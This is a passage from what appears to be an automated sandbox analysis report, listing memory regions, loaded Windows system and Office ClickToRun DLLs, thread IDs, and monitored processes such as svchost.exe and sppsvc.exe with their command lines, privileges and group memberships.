shared\\clicktorun\\mso20win32client.dll") Region: id = 7877 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 7878 start_va = 0x7fef7f80000 end_va = 0x7fef7fb2fff monitored = 0 entry_point = 0x7fef7fa435c region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 7879 start_va = 0x7fef7fc0000 end_va = 0x7fef805dfff monitored = 0 entry_point = 0x7fef8009d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 7880 start_va = 0x7fef92b0000 end_va = 0x7fef9356fff monitored = 0 entry_point = 0x7fef92c050c region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 7881 start_va = 0x7fefa500000 end_va = 0x7fefa815fff monitored = 0 entry_point = 0x7fefa503e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 7882 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7883 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7884 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 7885 start_va = 0x7fefb7d0000 end_va = 0x7fefb7f9fff monitored = 0 entry_point = 0x7fefb7d5b40 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 7886 start_va = 0x7fefb800000 end_va = 0x7fefb802fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 7887 start_va = 0x7fefb810000 end_va = 0x7fefb812fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 7888 start_va = 0x7fefb820000 end_va = 0x7fefb911fff monitored = 0 entry_point = 0x7fefb829060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll") Region: id = 7889 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7890 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7891 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7892 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7893 start_va = 0x7fefb990000 end_va = 0x7fefb992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 7894 start_va = 0x7fefb9a0000 end_va = 0x7fefb9a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 7895 start_va = 0x7fefb9b0000 end_va = 0x7fefb9b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 7896 start_va = 0x7fefb9c0000 end_va = 0x7fefb9c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 7897 start_va = 0x7fefb9d0000 end_va = 0x7fefb9d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 7898 start_va = 0x7fefb9e0000 end_va = 0x7fefb9e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 7899 start_va = 0x7fefb9f0000 end_va = 0x7fefb9f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 7900 start_va = 0x7fefba00000 end_va = 0x7fefba02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 7901 start_va = 0x7fefba10000 end_va = 0x7fefba13fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 7902 start_va = 0x7fefba20000 end_va = 0x7fefba22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l1-2-0.dll") Region: id = 7903 start_va = 0x7fefba30000 end_va = 0x7fefba32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 7904 start_va = 0x7fefba40000 end_va = 0x7fefba42fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 7905 start_va = 0x7fefba50000 end_va = 0x7fefba52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 7906 start_va = 0x7fefba60000 end_va = 0x7fefba62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll") Region: id = 7907 start_va = 0x7fefba70000 end_va = 0x7fefba72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 7908 start_va = 0x7fefba80000 end_va = 0x7fefba96fff monitored = 0 entry_point = 0x7fefba8c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 7909 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7910 start_va = 0x7fefbac0000 end_va = 0x7fefbac3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 7911 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7912 start_va = 0x7fefbe50000 end_va = 0x7fefc064fff monitored = 0 entry_point = 0x7fefc0264b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 7913 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 7914 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 7915 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 7916 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 7917 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 7918 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7919 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7920 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7921 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 7922 start_va = 0x7fefd1c0000 end_va = 0x7fefd20ffff monitored = 0 entry_point = 0x7fefd1c11e0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 7923 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7924 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 7925 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 7926 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7927 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7928 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 7929 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7930 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 7931 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 7932 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7933 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 7934 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 7935 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 7936 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 7937 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7938 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7939 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7940 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7941 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7942 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 7943 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7944 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7945 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7946 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7947 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7948 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 7949 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7950 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7951 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7952 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7953 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7954 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 7955 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 7956 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7957 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7958 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 7959 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 7960 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 7961 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 7962 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 7963 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 7964 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 7965 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 7966 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 7967 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7968 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 7969 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7970 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 7971 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7972 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 447 os_tid = 0x31c Thread: id = 448 os_tid = 0x660 Thread: id = 449 os_tid = 0x65c Thread: id = 450 os_tid = 0x654 Thread: id = 451 os_tid = 0x644 Thread: id = 452 os_tid = 0x640 Thread: id = 453 os_tid = 0x638 Thread: id = 454 os_tid = 0x630 Thread: id = 455 os_tid = 0x61c Thread: id = 456 os_tid = 0x618 Thread: id = 457 os_tid = 0x610 Thread: id = 458 os_tid = 0x60c Thread: id = 459 os_tid = 0x608 Process: id = "48" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5c409000" os_pid = "0x304" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\FontCache" [0xe], "NT SERVICE\\Mcx2Svc" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TBS" [0xa], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00034fa9" [0xc000000f], "LOCAL" [0x7] Thread: id = 460 os_tid = 0x480 Thread: id = 461 os_tid = 0x57c Thread: id = 462 os_tid = 0x308 Thread: id = 463 os_tid = 0x334 Thread: id = 464 os_tid = 0x35c Thread: id = 465 os_tid = 0x25c Thread: id = 466 os_tid = 0x7d8 Thread: id = 467 os_tid = 0x124 Thread: id = 468 os_tid = 0x268 Process: id = "49" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x5c615000" os_pid = "0x53c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:000369a5" [0xc000000f], "LOCAL" [0x7] Thread: id = 469 os_tid = 